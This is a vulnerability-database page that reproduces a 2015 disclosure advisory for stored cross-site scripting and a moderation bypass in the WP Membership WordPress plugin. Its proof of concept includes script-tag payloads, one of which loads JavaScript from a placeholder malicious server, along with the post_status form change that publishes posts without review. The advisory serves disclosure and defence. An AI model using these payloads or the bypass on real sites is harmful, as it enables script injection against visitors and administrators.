Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPanVagenasPACKETSTORM:132011
HistoryMay 22, 2015 - 12:00 a.m.

WordPress WP Membership 1.2.3 Cross Site Scripting

2015-05-2200:00:00
panVagenas
packetstormsecurity.com
26

0.003 Low

EPSS

Percentile

63.6%

JSON
`# Exploit Title: WordPress WP Membership plugin [Stored XSS]  
# Contact: https://twitter.com/panVagenas  
# Vendor Homepage: http://wpmembership.e-plugins.com/  
# Software Link: http://codecanyon.net/item/wp-membership/10066554  
# Version: 1.2.3  
# Tested on: WordPress 4.2.2  
# CVE: CVE-2015-4039  
  
=============================================  
* 1. Stored XSS  
=============================================  
  
1.1 Description  
  
All input fields from registered users aren't properly escaped. This could lead to an XSS attack that could possibly affect all visitors of the website, including administators.  
  
1.2 Proof of Concept  
  
* Login as regular user  
* Update any field of your profile appending at the end  
`<script>alert('XSS');</script>`   
or   
`<script src=”http://malicious .server/my_malicious_script.js”/>`  
  
1.3 Actions taken after discovery  
  
Vendor was informed on 2015/05/19.  
  
1.4 Solution  
  
No official solution yet exists.  
  
=============================================  
* 2. Unauthorized post publish and stored XSS  
=============================================  
  
2.1 Description  
  
Registered users can publish a post without administrator confirmation. Normally all posts submitted by users registered with WP Membership plugin are stored with the status `pending`. A malicious user though can publish his post by crafting the form is used for submission.  
  
2.2 Proof of Concept  
  
* Login as regular user  
whom belongs to a group that can submit new posts  
* Visit the `New Post` section at your profile  
* Change field `post_status`:  
<select id="post_status" class="form-control" name="post_status">  
<option value="publish" selected=”selected”>Pending Review</option>  
<option value="draft">Draft</option>  
</select>  
  
The post gets immediately published after you submit the form and is visible to all visitors of the website.  
  
In addition a stored XSS attack can be performed due to insufficient escaping of the post content input.  
  
2.3 Actions taken after discovery  
  
Vendor was informed on 2015/05/19.  
  
2.4 Solution  
  
No official solution yet exists.  
  
2.5 Workaround  
  
Prevent users from submitting new posts through the relative option in plugin's settings  
`

Related

securityvulns 2
prion 1
cve 1
wpvulndb 1
securityvulns
securityvulns
CVE-2015-4039 - WordPress WP Membership plugin [Stored XSS]
2015-06-08 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-06-08 00:00:00
prion
prion
Cross site scripting
2020-01-06 19:15:00
cve
cve
CVE-2015-4039
2020-01-06 19:15:00
wpvulndb
wpvulndb
WP Membership <= 1.2.3 - Multiple Vulnerabilities
2015-05-21 00:00:00

0.003 Low

EPSS

Percentile

63.6%

JSON
Related for PACKETSTORM:132011
securityvulns2prion1cve1wpvulndb1